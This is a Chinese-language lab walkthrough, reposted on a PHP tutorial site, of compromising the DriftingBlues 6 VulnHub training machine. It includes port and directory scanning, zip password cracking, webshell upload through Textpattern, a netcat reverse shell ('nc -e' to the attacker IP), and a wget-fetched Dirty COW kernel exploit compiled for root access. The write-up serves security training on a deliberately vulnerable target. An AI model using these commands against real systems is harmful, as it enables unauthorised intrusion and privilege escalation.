DRIFTINGBLUES：6

絕刀狂花

发布时间：2025-07-12 10:04:01

512人浏览过

来源于php中文网

原创

driftingblues: 6靶机介绍下载地址：https://download.vulnhub.com/driftingblues/driftingblues6_vh.ova难度：easy运行环境：virtualbox

攻击主机：kali 2021

目标主机：DRIFTINGBLUES: 6

打靶开始1.主机发现

使用ARP扫描可以快速的发现当前网段所有的开启主机

2.端口扫描

还是老套路

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">nmap -sV -sC -p- 192.168.0.104 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-10 02:06 EDTNmap scan report for 192.168.0.104Host is up (0.0019s latency).Not shown: 65534 closed portsPORT   STATE SERVICE VERSION80/tcp open  http    Apache httpd 2.2.22 ((Debian))| http-robots.txt: 1 disallowed entry |_/textpattern/textpattern|_http-server-header: Apache/2.2.22 (Debian)|_http-title: driftingblues</code>

3.信息收集

使用浏览器访问目标WEB站点，得到了一串提示

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">User-agent: *Disallow: /textpattern/textpatterndont forget to add .zip extension to your dir-brute;)</code>

访问该路径得到一个登录地址，另一段提示应该是一个zip文件，应该保存了一些密码之类的····

使用dirb工具进行爆破

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">dirb http://192.168.0.104/ /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -X .zip</code>

再次进行目录爆破，我比较习惯用dirsearch

音疯

音疯是昆仑万维推出的一个AI音乐创作平台，每日可以免费生成6首歌曲。

下载

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/ -i 200[02:36:29] 200 -   52KB - /db[02:36:30] 200 -  750B  - /index[02:36:30] 200 -  750B  - /index.html[02:36:33] 200 -  110B  - /robots.txt[02:36:35] 200 -   12KB - /textpattern/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/textpattern/ -i 200[02:45:38] 200 -    0B  - /textpattern/textpattern/config.php[02:45:40] 200 -    5KB - /textpattern/textpattern/include/[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php[02:45:40] 200 -    4KB - /textpattern/textpattern/index.php/login/[02:45:41] 200 -    6KB - /textpattern/textpattern/lib/[02:45:43] 200 -  784B  - /textpattern/textpattern/plugins/[02:45:43] 200 -    2KB - /textpattern/textpattern/publish/[02:45:44] 200 -    3KB - /textpattern/textpattern/setup/[02:45:45] 200 -  776B  - /textpattern/textpattern/tmp/[02:45:46] 200 -    2KB - /textpattern/textpattern/vendors/-----------------------------------------------------┌──(yifang㉿yifang)-[~]└─$ dirsearch -u http://192.168.0.104/textpattern/ -i 200[02:46:59] 200 -   66KB - /textpattern/HISTORY[02:46:59] 200 -   66KB - /textpattern/HISTORY.txt[02:46:59] 200 -   15KB - /textpattern/LICENSE.txt[02:47:00] 200 -   15KB - /textpattern/LICENSE[02:47:00] 200 -    6KB - /textpattern/README[02:47:00] 200 -    6KB - /textpattern/README.txt[02:47:04] 200 -    0B  - /textpattern/css.php[02:47:05] 200 -  944B  - /textpattern/files/[02:47:06] 200 -  746B  - /textpattern/images/[02:47:06] 200 -   12KB - /textpattern/index.php[02:47:10] 200 -    4KB - /textpattern/textpattern/[02:47:10] 200 -  746B  - /textpattern/themes/</code>

4.离线口令爆破代码语言：javascript代码运行次数：0运行复制

<code class="javascript">┌──(yifang㉿yifang)-[~]└─$ zip2john spammer.zip > passwd  #先生成zip的哈希散列ver 2.0 spammer.zip/creds.txt PKZIP Encr: cmplen=27, decmplen=15, crc=B003611D┌──(yifang㉿yifang)-[~]└─$ john passwd --show #注意这里需要加一个showspammer.zip/creds.txt:myspace4:creds.txt:spammer.zip::spammer.zip1 password hash cracked, 0 left┌──(yifang㉿yifang)-[~]└─$ unzip spammer.zip  #进行zip解压Archive:  spammer.zip[spammer.zip] creds.txt password:  extracting: creds.txt               ┌──(yifang㉿yifang)-[~]└─$ cat creds.txt mayer:lionheart---------------------------------账户：mayer密码：lionheart</code>

5.文件上传Getshell

登录后台，进入【Content】->【Files】下，进行文件上传，令人兴奋的是，这里可以上传任何文件，

而路径就在http://192.168.0.104/textpattern/files/shell.php

蚁剑连接成功

6.后渗透提权

首先进行nc转移shell，目标的nc似乎存在-e的功能

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">目标主机：nc -e /bin/shell 192.168.0.103 4444kali：nc -lvp 4444</code>

在尝试了两种提权方式 sudoers SUID 并没有找到有用的文件，尝试使用 脏牛 进行提权操作

代码语言：javascript代码运行次数：0运行复制

<code class="javascript">kalicp /usr/share/exploitdb/exploits/linux/local/40839.c .python3 -m http.server-----------------------------------------------目标主机:python -c 'import pty; pty.spawn("/bin/bash")'cd /tmpwget http://192.168.0.103:8000/40839.cgcc -pthread 40839.c -o dirty -lcrypt./dirty-----------------重新连接ncshellpython -c 'import pty; pty.spawn("/bin/bash")'su firefartidcat /root/flag.txt</code>

打靶结束

作者：yifang

Linux DNS解析失败_DNS问题定位方法

Linux系统资源告警频繁_告警阈值优化思路

Linux云磁盘性能问题_云磁盘IO分析

Linux anacron 与 cron 区别

Linux开机自动挂载_fstab配置详解

相关专题

http500解决方法

http500解决方法有检查服务器日志、检查代码错误、检查服务器配置、检查文件和目录权限、检查资源不足、更新软件版本、重启服务器或寻求专业帮助等。本专题为大家提供相关的文章、下载、课程内容，供大家免费下载体验。

490

2023.11.09

http请求415错误怎么解决

解决方法：1、检查请求头中的Content-Type；2、检查请求体中的数据格式；3、使用适当的编码格式；4、使用适当的请求方法；5、检查服务器端的支持情况。更多http请求415错误怎么解决的相关内容，可以阅读下面的文章。

448

2023.11.14

HTTP 503错误解决方法

HTTP 503错误表示服务器暂时无法处理请求。想了解更多http错误代码的相关内容，可以阅读本专题下面的文章。

3373

2024.03.12

http与https有哪些区别

http与https的区别：1、协议安全性；2、连接方式；3、证书管理；4、连接状态；5、端口号；6、资源消耗；7、兼容性。本专题为大家提供相关的文章、下载、课程内容，供大家免费下载体验。

2835

2024.08.16

http与https有哪些区别

2835

2024.08.16

JavaScript浏览器渲染机制与前端性能优化实践

本专题围绕 JavaScript 在浏览器中的执行与渲染机制展开，系统讲解 DOM 构建、CSSOM 解析、重排与重绘原理，以及关键渲染路径优化方法。内容涵盖事件循环机制、异步任务调度、资源加载优化、代码拆分与懒加载等性能优化策略。通过真实前端项目案例，帮助开发者理解浏览器底层工作原理，并掌握提升网页加载速度与交互体验的实用技巧。

2026.03.06

Rust内存安全机制与所有权模型深度实践

本专题围绕 Rust 语言核心特性展开，深入讲解所有权机制、借用规则、生命周期管理以及智能指针等关键概念。通过系统级开发案例，分析内存安全保障原理与零成本抽象优势，并结合并发场景讲解 Send 与 Sync 特性实现机制。帮助开发者真正理解 Rust 的设计哲学，掌握在高性能与安全性并重场景中的工程实践能力。

2026.03.05

PHP高性能API设计与Laravel服务架构实践

本专题围绕 PHP 在现代 Web 后端开发中的高性能实践展开，重点讲解基于 Laravel 框架构建可扩展 API 服务的核心方法。内容涵盖路由与中间件机制、服务容器与依赖注入、接口版本管理、缓存策略设计以及队列异步处理方案。同时结合高并发场景，深入分析性能瓶颈定位与优化思路，帮助开发者构建稳定、高效、易维护的 PHP 后端服务体系。

108

2026.03.04